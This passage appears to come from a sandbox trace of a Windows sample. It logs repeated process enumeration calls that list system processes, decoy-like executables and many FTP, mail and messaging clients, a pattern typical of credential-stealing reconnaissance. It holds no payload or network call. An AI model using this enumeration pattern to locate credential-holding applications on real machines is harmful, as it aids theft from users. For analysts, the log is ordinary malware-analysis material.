lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.589] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0064.589] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.589] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0064.589] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.590] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0064.590] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.591] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0064.591] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.592] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0064.592] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0064.592] PathRemoveExtensionA (in: pszPath="audiodg.exe" | out: pszPath="audiodg") [0064.593] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.593] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0064.593] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.594] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0064.594] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0064.595] PathRemoveExtensionA (in: pszPath="dwm.exe" | out: pszPath="dwm") [0064.595] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0064.595] PathRemoveExtensionA (in: pszPath="explorer.exe" | out: pszPath="explorer") [0064.596] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0064.596] PathRemoveExtensionA (in: pszPath="spoolsv.exe" | out: pszPath="spoolsv") [0064.596] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.597] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0064.597] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0064.598] PathRemoveExtensionA (in: pszPath="taskhost.exe" | out: pszPath="taskhost") [0064.598] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0064.598] PathRemoveExtensionA (in: pszPath="taskeng.exe" | out: pszPath="taskeng") [0064.598] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="allow_south.exe")) returned 1 [0064.599] PathRemoveExtensionA (in: pszPath="allow_south.exe" | out: pszPath="allow_south") [0064.599] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="killed-dependent.exe")) returned 1 [0064.600] PathRemoveExtensionA (in: pszPath="killed-dependent.exe" | out: pszPath="killed-dependent") [0064.600] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mercury.exe")) returned 1 [0064.601] PathRemoveExtensionA (in: pszPath="mercury.exe" | out: pszPath="mercury") [0064.601] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smithsonian_census_litigation.exe")) returned 1 [0064.601] PathRemoveExtensionA (in: pszPath="smithsonian_census_litigation.exe" | out: pszPath="smithsonian_census_litigation") [0064.601] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="hrs.exe")) returned 1 [0064.602] PathRemoveExtensionA (in: pszPath="hrs.exe" | out: pszPath="hrs") [0064.602] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="combined nearest.exe")) returned 1 [0064.603] PathRemoveExtensionA (in: pszPath="combined nearest.exe" | out: pszPath="combined nearest") [0064.603] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="equations.exe")) returned 1 [0064.604] PathRemoveExtensionA (in: pszPath="equations.exe" | out: pszPath="equations") [0064.604] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pubmed-ranging-expired.exe")) returned 1 [0064.604] PathRemoveExtensionA (in: pszPath="pubmed-ranging-expired.exe" | out: pszPath="pubmed-ranging-expired") [0064.604] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ng microphone options.exe")) returned 1 [0064.605] PathRemoveExtensionA (in: pszPath="ng microphone options.exe" | out: pszPath="ng microphone options") [0064.605] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="perspectivesimagineclassics.exe")) returned 1 [0064.606] PathRemoveExtensionA (in: pszPath="perspectivesimagineclassics.exe" | out: pszPath="perspectivesimagineclassics") [0064.606] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="exposure.exe")) returned 1 [0064.607] PathRemoveExtensionA (in: pszPath="exposure.exe" | out: pszPath="exposure") [0064.607] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="tablet.exe")) returned 1 [0064.608] PathRemoveExtensionA (in: pszPath="tablet.exe" | out: pszPath="tablet") [0064.608] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="essex_serious.exe")) returned 1 [0064.608] PathRemoveExtensionA (in: pszPath="essex_serious.exe" | out: pszPath="essex_serious") [0064.608] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fbi-conflicts.exe")) returned 1 [0064.609] PathRemoveExtensionA (in: pszPath="fbi-conflicts.exe" | out: pszPath="fbi-conflicts") [0064.609] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="madisoncorn.exe")) returned 1 [0064.610] PathRemoveExtensionA (in: pszPath="madisoncorn.exe" | out: pszPath="madisoncorn") [0064.610] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="treaty restoration.exe")) returned 1 [0064.611] PathRemoveExtensionA (in: pszPath="treaty restoration.exe" | out: pszPath="treaty restoration") [0064.611] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ministries_vegetable_facilitate.exe")) returned 1 [0064.612] PathRemoveExtensionA (in: pszPath="ministries_vegetable_facilitate.exe" | out: pszPath="ministries_vegetable_facilitate") [0064.612] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0064.612] PathRemoveExtensionA (in: pszPath="3dftp.exe" | out: pszPath="3dftp") [0064.613] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0064.613] PathRemoveExtensionA (in: pszPath="absolutetelnet.exe" | out: pszPath="absolutetelnet") [0064.613] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0064.614] PathRemoveExtensionA (in: pszPath="alftp.exe" | out: pszPath="alftp") [0064.614] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0064.615] PathRemoveExtensionA (in: pszPath="barca.exe" | out: pszPath="barca") [0064.615] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0064.616] PathRemoveExtensionA (in: pszPath="bitkinex.exe" | out: pszPath="bitkinex") [0064.616] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0064.616] PathRemoveExtensionA (in: pszPath="coreftp.exe" | out: pszPath="coreftp") [0064.617] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x31c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0064.617] PathRemoveExtensionA (in: pszPath="far.exe" | out: pszPath="far") [0064.617] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x534, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0064.618] PathRemoveExtensionA (in: pszPath="filezilla.exe" | out: pszPath="filezilla") [0064.618] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0064.619] PathRemoveExtensionA (in: pszPath="flashfxp.exe" | out: pszPath="flashfxp") [0064.619] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0064.620] PathRemoveExtensionA (in: pszPath="fling.exe" | out: pszPath="fling") [0064.620] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0064.620] PathRemoveExtensionA (in: pszPath="foxmailincmail.exe" | out: pszPath="foxmailincmail") [0064.620] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0064.621] PathRemoveExtensionA (in: pszPath="gmailnotifierpro.exe" | out: pszPath="gmailnotifierpro") [0064.621] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0064.622] PathRemoveExtensionA (in: pszPath="icq.exe" | out: pszPath="icq") [0064.622] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0064.623] PathRemoveExtensionA (in: pszPath="leechftp.exe" | out: pszPath="leechftp") [0064.623] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0064.625] PathRemoveExtensionA (in: pszPath="ncftp.exe" | out: pszPath="ncftp") [0064.625] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0064.625] PathRemoveExtensionA (in: pszPath="notepad.exe" | out: pszPath="notepad") [0064.625] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0064.630] Process32First (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0064.630] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0064.631] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0064.632] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0064.632] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0064.633] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0064.634] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0064.634] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0064.635] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0064.636] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0064.636] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.637] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.638] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.638] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.639] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.640] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0064.640] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.641] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.642] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0064.642] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0064.643] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0064.644] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.644] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0064.645] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0064.645] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="allow_south.exe")) returned 1 [0064.646] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 